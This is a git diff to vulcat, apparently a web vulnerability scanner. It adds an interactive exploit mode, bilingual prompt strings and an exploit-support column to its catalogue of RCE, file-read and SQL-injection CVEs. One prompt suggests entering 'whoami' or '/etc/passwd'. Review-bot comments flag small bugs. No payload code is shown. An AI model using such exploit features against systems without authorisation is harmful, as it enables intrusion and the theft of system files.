@@ -8,7 +8,6 @@ from lib.initial.language import language from thirdparty.requests import packages import re -import http.client import socket import socks @@ -21,7 +20,7 @@ def __init__(self, args): args.ceye_domain = '' # * http://ceye.io/ 平台的域名 args.ceye_token = '' # * http://ceye.io/ 平台的token - + args.lang = language() # * 语言 args.url_list = [] # * url列表 @@ -105,6 +104,7 @@ def __init__(self, args): if args.vuln: args.vuln = args.vuln.lower() args.vuln = args.vuln.replace('-', '_') + args.vuln = args.vuln.replace('.', '_') app_list = [ 'alidruid', 'airflow', 'apisix', 'appweb', @@ -122,7 +122,7 @@ def __init__(self, args): 'nexus', 'nacos', 'nodejs', 'nodered', 'phpmyadmin', 'phpunit', 'rails', - 'showdoc', 'solr', 'struts2', 'spring', 'skywalking', + 'showdoc', 'solr', 'spring', 'skywalking', 'supervisor', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'webmin', diff --git a/lib/initial/language.py b/lib/initial/language.py index a1bcc93..bd82d7a 100644 --- a/lib/initial/language.py +++ b/lib/initial/language.py 
@@ -47,7 +47,8 @@ def language(): 'title': 'Application', 'name': 'Specify the target type for the scan', 'application': 'Specifies the target type, for supported frameworks, see the tips at the bottom, separated by commas (e.g. thinkphp / thinkphp,weblogic) (default: auto)', - 'vuln': 'Specify the vulnerability number,With -a/--application to scan a single vulnerability,You can use --list to see the vulnerability number,vulnerabilities that do not have a vulnerability number are not supported.The number does not discriminate between sizes, and the symbol - and _ are acceptable (e.g. -a fastjson -v cnVD-2019-22238 or -a Tomcat -v CVE-2017_12615)' + 'vuln': 'Specify the vulnerability number,With -a/--application to scan a single vulnerability,You can use --list to see the vulnerability number,vulnerabilities that do not have a vulnerability number are not supported.The number does not discriminate between sizes, and the symbol - and _ are acceptable (e.g. -a fastjson -v cnVD-2019-22238 or -a Tomcat -v CVE-2017_12615)', + 'exp': 'Use with the -a and -v parameters, After the Poc scan, if the vulnerability exists, enter the Exp interaction mode of the vulnerability; You can use --list to see Exp support vulnerabilities. (e.g. -a httpd -v CVE-2021-42013 -x)' }, 'api_help': { 'title': 'Api', 
@@ -74,14 +75,15 @@ def language(): }, 'app_list_help': { 'title': 'Supported target types(Case insensitive)', - 'name': 'AliDruid, airflow, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, solr, struts2, spring, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou' + 'name': 'AliDruid, airflow, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, solr, spring, supervisor, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou' }, 'core': { 'start': { 'start': '[INFO] Start scanning target ', 'unable': '[WARN] Unable to connect to ', 'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://', - 'no_poc': '[No-POC] Disable Vulnerability scanning' + 'no_poc': '[No-POC] Disable Vulnerability scanning', + 'exp': 'When using -x/--exp, specify a vulnerability with -a and -v first(e.g. -a httpd -v cve-2021-41773 -x)' }, 'waf_finger': { 'waf': '[INFO] The WAF detection for the current URL starts', @@ -114,6 +116,9 @@ def language(): 'end': { 'wait': '[INFO] Wait for all threads to finish. Please wait...', 'completed': '[INFO] Scan is completed' + }, + 'start_exp': { + 'lock': 'If you want to use -x/--exp, Please read the "vulcat/Exploit.lock" statement first, Delete the file with consent to the declaration, After the deletion, run -x/--exp again' } }, 'output': { 
@@ -173,7 +178,8 @@ def language(): 'title': 'Application', 'name': '指定扫描的目标类型', 'application': '指定框架类型, 支持的框架可以参考最下面的提示信息, 多个使用逗号分隔 (如: thinkphp 或者 thinkphp,weblogic) (默认将启用指纹识别, 并使用相应POC, 如果未识别出框架则使用全部POC)', - 'vuln': '指定漏洞编号, 配合-a/--application对单个漏洞进行扫描, 可以使用--list查看漏洞编号, 没有漏洞编号的漏洞暂不支持, 编号不区分大小, 符号-和_皆可 (如: -a fastjson -v CNVD-2019-22238 或者 -a Tomcat -v cvE-2017_12615)' + 'vuln': '指定漏洞编号, 配合-a/--application对单个漏洞进行扫描, 可以使用--list查看漏洞编号, 没有漏洞编号的漏洞暂不支持, 编号不区分大小, 符号-和_皆可 (如: -a fastjson -v CNVD-2019-22238 或者 -a Tomcat -v cvE-2017_12615)', + 'exp': '配合-a和-v参数进行使用, Poc扫描过后, 如果该漏洞存在, 则进入该漏洞的Exp交互模式; 可以使用--list查看支持Exp的漏洞(如: -a httpd -v CVE-2021-42013 -x)' }, 'api_help': { 'title': 'Api', @@ -200,14 +206,15 @@ def language(): }, 'app_list_help': { 'title': '支持的目标类型(-a参数, 不区分大小写)', - 'name': 'AliDruid, airflow, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, solr, struts2, spring, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou' + 'name': 'AliDruid, airflow, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, solr, spring, supervisor, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou' }, 'core': { 'start': { 'start': '[INFO] 开始扫描目标 ', 'unable': '[WARN] 无法连接到 ', 'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头', - 'no_poc': '[No-POC] 不进行漏洞扫描' + 'no_poc': '[No-POC] 不进行漏洞扫描', + 'exp': '使用-x/--exp时请先使用-a和-v指定一个漏洞, 例如-a httpd -v cve-2021-41773 -x' }, 'waf_finger': { 'waf': '[INFO] 对当前url进行WAF检测, 请稍等...', 
@@ -240,6 +247,9 @@ def language(): 'end': { 'wait': '[INFO] 等待所有线程结束, 请稍等...', 'completed': '[INFO] 扫描完成' + }, + 'start_exp': { + 'lock': '如果要使用-x/--exp, 请先阅读"vulcat/Exploit.lock"文件中的声明, 在同意声明的情况下删除该文件, 删除之后再次运行-x/--exp' } }, 'output': { @@ -267,6 +277,9 @@ def language(): } } +lang['en_us']['disclaimer'] = '''By using this tool, you agree to the "Code of Conduct and Disclaimer" in "vulcat/README.md; If you do not agree, do not use this tool."\n\n\n''' +lang['zh_cn']['disclaimer'] = '''使用本工具, 代表您同意"vulcat/README.zh-cn.md"中的"行为规范和免责声明"; 如果您不同意, 请勿使用本工具\n\n\n''' + # * --list的中文 lang['zh_cn']['list'] = { 'Alibaba Druid': '阿里巴巴Druid未授权访问', @@ -276,7 +289,7 @@ def language(): 'Apache Flink': {'CVE-2020-17519': 'Flink目录遍历',}, 'Apache Hadoop': 'Hadoop YARN ResourceManager 未授权访问', 'Apache Httpd': { - 'CVE-2021-40438': 'Apache HTTP Server 2.4.48 mod_proxy SSRF ', + 'CVE-2021-40438': 'Apache HTTP Server 2.4.48 mod_proxy SSRF ', 'CVE-2021-41773': 'Apache HTTP Server 2.4.49 路径遍历', 'CVE-2021-42013': 'Apache HTTP Server 2.4.50 路径遍历', }, @@ -286,14 +299,6 @@ def language(): 'CVE-2019-17558': 'Solr Velocity 注入远程命令执行', 'CVE-2021-27905': 'Solr SSRF/任意文件读取', }, - 'Apache Struts2': { - 'S2-001': 'Struts2远程代码执行', - 'S2-005': 'Struts2远程代码执行', - 'S2-007': 'Struts2远程代码执行', - 'S2-008': 'Struts2远程代码执行', - 'S2-009': 'Struts2远程代码执行', - 'S2-012': 'Struts2远程代码执行', - }, 'Apache Tomcat': {'CVE-2017-12615': 'PUT方法任意文件写入',}, 'AppWeb': {'CVE-2018-8715': 'AppWeb身份认证绕过',}, 'Atlassian Confluence': { @@ -382,6 +387,9 @@ def language(): 'CVE-2022-22963': 'Spring Cloud Function SpEL远程代码执行', 'CVE-2022-22965': 'Spring Framework远程代码执行', }, + 'Supervisor': { + 'CVE-2017-11610': 'Supervisor 远程命令执行' + }, 'ThinkPHP': { 'CVE-2018-1002015': 'ThinkPHP5.x 远程代码执行', 'CNVD-2018-24942': '未开启强制路由导致RCE', 
@@ -428,17 +436,9 @@ def language(): 'Apache SkyWalking': {'CVE-2020-9483': 'SkyWalking SQLinject',}, 'Apache Solr': { 'CVE-2017-12629': 'Solr Remote code execution', - 'CVE-2019-17558': 'Solr Remote Code Execution Via Velocity Custom Template', + 'CVE-2019-17558': 'Solr RCE Via Velocity Custom Template', 'CVE-2021-27905': 'Solr SSRF/FileRead', }, - 'Apache Struts2': { - 'S2-001': 'Apache Struts2 Remote code execution', - 'S2-005': 'Apache Struts2 Remote code execution', - 'S2-007': 'Apache Struts2 Remote code execution', - 'S2-008': 'Apache Struts2 Remote code execution', - 'S2-009': 'Apache Struts2 Remote code execution', - 'S2-012': 'Apache Struts2 Remote code execution', - }, 'Apache Tomcat': {'CVE-2017-12615': 'Put method writes to any file',}, 'AppWeb': {'CVE-2018-8715': 'AppWeb Authentication bypass',}, 'Atlassian Confluence': { @@ -527,9 +527,12 @@ def language(): 'CVE-2022-22963': 'Spring Cloud Function SpEL Remote code execution', 'CVE-2022-22965': 'Spring Framework Remote code execution', }, + 'Supervisor': { + 'CVE-2017-11610': 'Supervisor Remote Command Execution' + }, 'ThinkPHP': { 'CVE-2018-1002015': 'ThinkPHP5.x Remote code execution', - 'CNVD-2018-24942': 'The forced route is not enabled Remote code execution', + 'CNVD-2018-24942': 'The forced route is not enabled RCE', 'CNNVD-201901-445': 'Core class Request Remote code execution', '2.x RCE': 'ThinkPHP2.x Remote code execution', '5 ids sqlinject': 'ThinkPHP5 ids SQLinject', 
@@ -550,7 +553,40 @@ def language(): 'CNNVD-201610-923': 'Yonyou-GRP-U8 Proxy SQLinject', 'CNVD-2021-30167': 'Yonyou-NC BeanShell Remote code execution', 'NCFindWeb': 'Yonyou-ERP-NC NCFindWeb Directory traversal', - 'getSessionList.jsp': 'Yonyou-U8-OA getSessionList.jsp Disclosure information', + 'getSessionList.jsp': 'Yonyou-U8-OA getSessionList.jsp Disclosure info', 'test.jsp': 'Yonyou-U8-OA test.jsp SQLinject', } -} \ No newline at end of file +} + +# ! -x/--exp中文------------------------------------------------------------ + +lang['zh_cn']['exploit'] = { + 'identify': '[+] 识别为"{}"漏洞, 进入Exp交互模式:', + 'not_exp': '[-] 没有识别到漏洞类型, 或该漏洞类型不支持Exp', + 'not_request': '[-] POC结果没有返回Request(HTTP请求数据包), 无法使用Exp', + 'input_command': '根据漏洞类型 输入相应的内容(例如"whoami"或"/etc/passwd"): ', + 'not_command': '请输入命令 (可以输入“exit”退出)', + 'faild_command': '[Faild] 使用该命令时发生错误', + 'not_search_command': '[INFO] 替换新payload失败, 没有在旧的HTTP数据包中检测到旧的payload', + 'exit': '[INFO] 退出Exploit模式', + 'exp_faild': '[Exploit] 请求失败', + 'not_response': '没有检测到响应包中的回显内容', + 're_error': 'vcsearch语法错误: 错误的正则表达式', +} + +# ! -x/--exp英文------------------------------------------------------------ +lang['en_us']['exploit'] = { + 'identify': '[+] Identified as "{}" vulnerability, Enter the Exp interactive mode:', + 'not_exp': '[-] The vulnerability type is not identified, or Exp is not supported by the vulnerability type', + 'not_request': '[-] The poc result did not return the Request(HTTP Request), Unable to use Exp', + 'input_command': 'Enter the value according to the vulnerability type(e.g. 
"whoami"or"/etc/passwd"): ', + 'not_command': 'Please enter the command(You can enter "exit" to exit)', + 'faild_command': '[Faild] An error occurred while using the command', + 'not_search_command': '[INFO] Description Failed to replace the new payload, No old payload was detected in the old HTTP packet', + 'exit': '[INFO] Exit the Exploit.', + 'exp_faild': '[Exploit] Request failed', + 'not_response': 'Echoes in response packets are not detected', + 're_error': 'vcsearch syntax error: Incorrect regular expression', +} + + diff --git a/lib/initial/list.py b/lib/initial/list.py index 7890ba1..d6cc4ae 100644 --- a/lib/initial/list.py +++ b/lib/initial/list.py 
@@ -6,45 +6,53 @@ import sys list_lang = language()['list'] -description_t = '\t' # * 中英文标题的长度不一样, 中文需要添加一个\t才能对齐 +description_t = '\t\t' # * 中英文标题的长度不一样, 中文需要添加\t才能对齐 # * ---横线长度--- Target_len_ = '-' * 22 Vul_id_len_ = '-' * 20 Type_len_ = '-' * 14 -Description_len_ = '-' * 68 +Exp_len_ = '-' * 5 +Description_len_ = '-' * 70 # * 中英文长度的处理 if ('Alibaba Druid unAuthorized' in list_lang['Alibaba Druid']): - Description_len_ = '-' * 60 + Description_len_ = '-' * 62 description_t = '' def list(): ''' 显示漏洞列表 ''' vul_num = 0 + exp_num = 0 vul_list = '' - vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Description_len_ + '+\n' + vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Exp_len_ + '+' + Description_len_ + '+\n' for vul in vul_info: for info in vul_info[vul]: vul_num += 1 + if info['exp'] == 'Y': + exp_num += 1 vul_list += '| {}|'.format(vul.ljust(21)) vul_list += ' {}|'.format(info['vul_id'].ljust(19)) vul_list += ' {}|'.format(info['type'].ljust(13)) - vul_list += ' {}\t|'.format(info['description'].ljust(57)) + vul_list += ' {}|'.format(info['exp'].center(4)) + vul_list += ' {}\t\t|'.format(info['description'].ljust(51)) vul_list += '\n' - vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Description_len_ + '+\n' + vul_list += '+' + Target_len_ + '+' + Vul_id_len_ + '+' + Type_len_ + '+' + Exp_len_ + '+' + Description_len_ + '+\n' - print(color.cyan(vul_list + str(vul_num - 1) + '/vulcat-1.1.4/2022.10')) + print(color.cyan(vul_list + 'vulcat-1.1.5/2022.11')) # * 2022-11-09_20:52 + print(color.cyan(str(vul_num - 1) + '/Poc')) # * 有一个是标题, 所以要-1 + print(color.cyan(str(exp_num) + '/Exp')) # print(vul_num) sys.exit(0) vul_info = { 'Target': [ { - 'vul_id': 'Vul_id', - 'type': 'Type', + 'vul_id': 'Vuln id', + 'type': 'Vuln Type', + 'exp': 'Exp', 'description': 'Description' + description_t } ], 
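Review bot: The new column read `info['exp']` (used twice in the loop in `list`) turns any payload entry that lacks the freshly introduced `exp` key into a `KeyError` that aborts `--list`, whereas the rest of the table is built from keys that every entry has always carried. Read it with a default so an entry added without the column simply shows as unsupported: `if info.get('exp', '-') == 'Y':` and `vul_list += ' {}|'.format(info.get('exp', '-').center(4))`. The version string `'vulcat-1.1.5/2022.11'` is now duplicated between this hunk and parse.py's `version=` argument, so consider sourcing both from one constant.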
@@ -52,6 +60,7 @@ def list(): { 'vul_id': 'None', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Alibaba Druid'] } ], @@ -59,6 +68,7 @@ def list(): { 'vul_id': 'CVE-2021-29441', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Alibaba Nacos']['CVE-2021-29441'] } ], @@ -66,6 +76,7 @@ def list(): { 'vul_id': 'CVE-2020-17526', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Apache Airflow']['CVE-2020-17526'] } ], @@ -73,6 +84,7 @@ def list(): { 'vul_id': 'CVE-2020-13945', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Apache APISIX']['CVE-2020-13945'] } ], @@ -80,6 +92,7 @@ def list(): { 'vul_id': 'CVE-2020-17519', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Apache Flink']['CVE-2020-17519'] } ], @@ -87,6 +100,7 @@ def list(): { 'vul_id': 'None', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Apache Hadoop'] } ], @@ -94,16 +108,19 @@ def list(): { 'vul_id': 'CVE-2021-40438', 'type': 'SSRF', + 'exp': '-', 'description': list_lang['Apache Httpd']['CVE-2021-40438'] }, { 'vul_id': 'CVE-2021-41773', 'type': 'FileRead/RCE', + 'exp': 'Y', 'description': list_lang['Apache Httpd']['CVE-2021-41773'] }, { 'vul_id': 'CVE-2021-42013', 'type': 'FileRead/RCE', + 'exp': 'Y', 'description': list_lang['Apache Httpd']['CVE-2021-42013'] } ], @@ -111,6 +128,7 @@ def list(): { 'vul_id': 'CVE-2020-9483', 'type': 'SQLinject', + 'exp': '-', 'description': list_lang['Apache SkyWalking']['CVE-2020-9483'] } ], 
@@ -118,55 +136,27 @@ def list(): { 'vul_id': 'CVE-2017-12629', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Apache Solr']['CVE-2017-12629'] }, { 'vul_id': 'CVE-2019-17558', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Apache Solr']['CVE-2019-17558'] }, { 'vul_id': 'CVE-2021-27905', - 'type': 'SSRF', + 'type': 'SSRF/FileRead', + 'exp': 'Y', 'description': list_lang['Apache Solr']['CVE-2021-27905'] }, ], - 'Apache Struts2': [ - { - 'vul_id': 'S2-001', - 'type': 'RCE', - 'description': list_lang['Apache Struts2']['S2-001'] - }, - { - 'vul_id': 'S2-005', - 'type': 'RCE', - 'description': list_lang['Apache Struts2']['S2-005'] - }, - { - 'vul_id': 'S2-007', - 'type': 'RCE', - 'description': list_lang['Apache Struts2']['S2-007'] - }, - { - 'vul_id': 'S2-008', - 'type': 'RCE', - 'description': list_lang['Apache Struts2']['S2-008'] - }, - { - 'vul_id': 'S2-009', - 'type': 'RCE', - 'description': list_lang['Apache Struts2']['S2-009'] - }, - { - 'vul_id': 'S2-012', - 'type': 'RCE', - 'description': list_lang['Apache Struts2']['S2-012'] - } - ], 'Apache Tomcat': [ { 'vul_id': 'CVE-2017-12615', 'type': 'FileUpload', + 'exp': '-', 'description': list_lang['Apache Tomcat']['CVE-2017-12615'] } ], @@ -174,6 +164,7 @@ def list(): { 'vul_id': 'CVE-2018-8715', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['AppWeb']['CVE-2018-8715'] } ], @@ -181,21 +172,25 @@ def list(): { 'vul_id': 'CVE-2015-8399', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Atlassian Confluence']['CVE-2015-8399'] }, { 'vul_id': 'CVE-2019-3396', - 'type': 'RCE/FileRead', + 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Atlassian Confluence']['CVE-2019-3396'] }, { 'vul_id': 'CVE-2021-26084', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Atlassian Confluence']['CVE-2021-26084'] }, { 'vul_id': 'CVE-2022-26134', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Atlassian Confluence']['CVE-2022-26134'] } ], 
@@ -203,6 +198,7 @@ def list(): { 'vul_id': 'CVE-2020-3580', 'type': 'XSS', + 'exp': '-', 'description': list_lang['Cisco']['CVE-2020-3580'] } ], @@ -210,6 +206,7 @@ def list(): { 'vul_id': 'wooyun-2010-080723', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Discuz']['wooyun-2010-080723'] } ], @@ -217,26 +214,31 @@ def list(): { 'vul_id': 'CVE-2017-12794', 'type': 'XSS', + 'exp': '-', 'description': list_lang['Django']['CVE-2017-12794'] }, { 'vul_id': 'CVE-2018-14574', 'type': 'Redirect', + 'exp': '-', 'description': list_lang['Django']['CVE-2018-14574'] }, { 'vul_id': 'CVE-2019-14234', 'type': 'SQLinject', + 'exp': '-', 'description': list_lang['Django']['CVE-2019-14234'] }, { 'vul_id': 'CVE-2020-9402', 'type': 'SQLinject', + 'exp': '-', 'description': list_lang['Django']['CVE-2020-9402'] }, { 'vul_id': 'CVE-2021-35042', 'type': 'SQLinject', + 'exp': '-', 'description': list_lang['Django']['CVE-2021-35042'] } ], @@ -244,21 +246,25 @@ def list(): { 'vul_id': 'CVE-2014-3704', 'type': 'SQLinject', + 'exp': '-', 'description': list_lang['Drupal']['CVE-2014-3704'] }, { 'vul_id': 'CVE-2017-6920', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Drupal']['CVE-2017-6920'] }, { 'vul_id': 'CVE-2018-7600', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Drupal']['CVE-2018-7600'] }, { 'vul_id': 'CVE-2018-7602', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Drupal']['CVE-2018-7602'] } ], @@ -266,21 +272,25 @@ def list(): { 'vul_id': 'CVE-2014-3120', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['ElasticSearch']['CVE-2014-3120'] }, { 'vul_id': 'CVE-2015-1427', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['ElasticSearch']['CVE-2015-1427'] }, { 'vul_id': 'CVE-2015-3337', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['ElasticSearch']['CVE-2015-3337'] }, { 'vul_id': 'CVE-2015-5531', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['ElasticSearch']['CVE-2015-5531'] }, ], 
@@ -288,11 +298,13 @@ def list(): { 'vul_id': 'CVE-2020-5902', 'type': 'RCE', + 'exp': '-', 'description': list_lang['F5 BIG-IP']['CVE-2020-5902'] }, { 'vul_id': 'CVE-2022-1388', - 'type': 'unAuth', + 'type': 'unAuth/RCE', + 'exp': 'Y', 'description': list_lang['F5 BIG-IP']['CVE-2020-5902'] } ], @@ -300,11 +312,13 @@ def list(): { 'vul_id': 'CNVD-2017-02833', 'type': 'unSerialize', + 'exp': '-', 'description': list_lang['Fastjson']['CNVD-2017-02833'] }, { 'vul_id': 'CNVD-2019-22238', 'type': 'unSerialize', + 'exp': '-', 'description': list_lang['Fastjson']['CNVD-2019-22238'] } ], @@ -312,6 +326,7 @@ def list(): { 'vul_id': 'None', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Gitea'] }, ], @@ -319,11 +334,13 @@ def list(): { 'vul_id': 'CVE-2021-22205', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Gitlab']['CVE-2021-22205'] }, { 'vul_id': 'CVE-2021-22214', 'type': 'SSRF', + 'exp': '-', 'description': list_lang['Gitlab']['CVE-2021-22214'] } ], @@ -331,6 +348,7 @@ def list(): { 'vul_id': 'CVE-2021-43798', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Grafana']['CVE-2021-43798'] }, ], @@ -338,6 +356,7 @@ def list(): { 'vul_id': 'None', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Influxdb'] }, ], @@ -345,6 +364,7 @@ def list(): { 'vul_id': 'CVE-2018-1000861', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Jenkins']['CVE-2018-1000861'] } ], @@ -352,16 +372,19 @@ def list(): { 'vul_id': 'CVE-2021-28164', 'type': 'DSinfo', + 'exp': '-', 'description': list_lang['Jetty']['CVE-2021-28164'] }, { 'vul_id': 'CVE-2021-28169', 'type': 'DSinfo', + 'exp': '-', 'description': list_lang['Jetty']['CVE-2021-28169'] }, { 'vul_id': 'CVE-2021-34429', 'type': 'DSinfo', + 'exp': '-', 'description': list_lang['Jetty']['CVE-2021-34429'] } ], @@ -369,6 +392,7 @@ def list(): { 'vul_id': 'None', 'type': 'unAuth', + 'exp': '-', 'description': list_lang['Jupyter'] } ], 
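Review bot: The CVE-2022-1388 entry that this hunk retypes to `'unAuth/RCE'` and marks `'exp': 'Y'` still takes its text from `list_lang['F5 BIG-IP']['CVE-2020-5902']`, so `--list` prints the CVE-2020-5902 description next to the CVE-2022-1388 id. That is a context line the commit leaves as is; it should read `'description': list_lang['F5 BIG-IP']['CVE-2022-1388']`, provided the language tables define that key (they are outside this hunk and I cannot confirm it from here).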
@@ -376,6 +400,7 @@ def list(): { 'vul_id': 'CVE-2020-10770', 'type': 'SSRF', + 'exp': '-', 'description': list_lang['Keycloak']['CVE-2020-10770'] } ], @@ -391,6 +416,7 @@ def list(): { 'vul_id': 'CNVD-2021-28277', 'type': 'FileRead/SSRF', + 'exp': 'Y', 'description': list_lang['Landray']['CNVD-2021-28277'] } ], @@ -398,6 +424,7 @@ def list(): { 'vul_id': 'CVE-2018-18778', 'type': 'FileRead', + 'exp': '-', 'description': list_lang['Mini Httpd']['CVE-2018-18778'] } ], @@ -405,6 +432,7 @@ def list(): { 'vul_id': 'CVE-2019-10758', 'type': 'RCE', + 'exp': '-', 'description': list_lang['mongo-express']['CVE-2019-10758'] } ], @@ -412,26 +440,31 @@ def list(): { 'vul_id': 'CVE-2019-5475', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Nexus Repository']['CVE-2019-5475'] }, { 'vul_id': 'CVE-2019-7238', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Nexus Repository']['CVE-2019-7238'] }, { 'vul_id': 'CVE-2019-15588', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['Nexus Repository']['CVE-2019-15588'] }, { 'vul_id': 'CVE-2020-10199', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Nexus Repository']['CVE-2020-10199'] }, { 'vul_id': 'CVE-2020-10204', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Nexus Repository']['CVE-2020-10204'] } ], @@ -439,11 +472,13 @@ def list(): { 'vul_id': 'CVE-2017-14849', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Nodejs']['CVE-2017-14849'] }, { 'vul_id': 'CVE-2021-21315', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Nodejs']['CVE-2021-21315'] } ], @@ -451,6 +486,7 @@ def list(): { 'vul_id': 'CVE-2021-3223', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['NodeRED']['CVE-2021-3223'] } ], 
@@ -458,11 +494,13 @@ def list(): { 'vul_id': 'WooYun-2016-199433', 'type': 'unSerialize', + 'exp': '-', 'description': list_lang['phpMyadmin']['WooYun-2016-199433'] }, { 'vul_id': 'CVE-2018-12613', 'type': 'FileInclude', + 'exp': 'Y', 'description': list_lang['phpMyadmin']['CVE-2018-12613'] }, ], @@ -470,6 +508,7 @@ def list(): { 'vul_id': 'CVE-2017-9841', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['PHPUnit']['CVE-2017-9841'] } ], @@ -477,16 +516,19 @@ def list(): { 'vul_id': 'CVE-2018-3760', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Ruby on Rails']['CVE-2018-3760'] }, { 'vul_id': 'CVE-2019-5418', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Ruby on Rails']['CVE-2019-5418'] }, { 'vul_id': 'CVE-2020-8163', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Ruby on Rails']['CVE-2020-8163'] } ], @@ -494,6 +536,7 @@ def list(): { 'vul_id': 'CNVD-2020-26585', 'type': 'FileUpload', + 'exp': '-', 'description': list_lang['ShowDoc']['CNVD-2020-26585'] } ], 
@@ -501,68 +544,89 @@ def list(): { 'vul_id': 'CVE-2016-4977', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Spring']['CVE-2016-4977'] }, { 'vul_id': 'CVE-2017-8046', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Spring']['CVE-2017-8046'] }, { 'vul_id': 'CVE-2018-1273', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Spring']['CVE-2018-1273'] }, { 'vul_id': 'CVE-2020-5410', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Spring']['CVE-2020-5410'] }, { 'vul_id': 'CVE-2021-21234', 'type': 'FileRead', + 'exp': 'Y', 'description': list_lang['Spring']['CVE-2021-21234'] }, { 'vul_id': 'CVE-2022-22947', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Spring']['CVE-2022-22947'] }, { 'vul_id': 'CVE-2022-22963', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Spring']['CVE-2022-22963'] }, { 'vul_id': 'CVE-2022-22965', 'type': 'RCE', + 'exp': '-', 'description': list_lang['Spring']['CVE-2022-22965'] }, ], + 'Supervisor': [ + { + 'vul_id': 'CVE-2017-11610', + 'type': 'RCE', + 'exp': '-', + 'description': list_lang['Supervisor']['CVE-2017-11610'] + } + ], 'ThinkPHP': [ { 'vul_id': 'CVE-2018-1002015', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['ThinkPHP']['CVE-2018-1002015'] }, { 'vul_id': 'CNVD-2018-24942', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['ThinkPHP']['CNVD-2018-24942'] }, { 'vul_id': 'CNNVD-201901-445', 'type': 'RCE', + 'exp': 'Y', 'description': list_lang['ThinkPHP']['CNNVD-201901-445'] }, { 'vul_id': 'None', 'type': 'RCE', + 'exp': '-', 'description': list_lang['ThinkPHP']['2.x RCE'] }, { 'vul_id': 'None', 'type': 'SQLinject', + 'exp': '-', 'description': list_lang['ThinkPHP']['5 ids sqlinject'] } ], @@ -570,6 +634,7 @@ def list(): { 'vul_id': 'None', 'type': 'SSRF', + 'exp': '-', 'description': list_lang['Ueditor'] } ], 
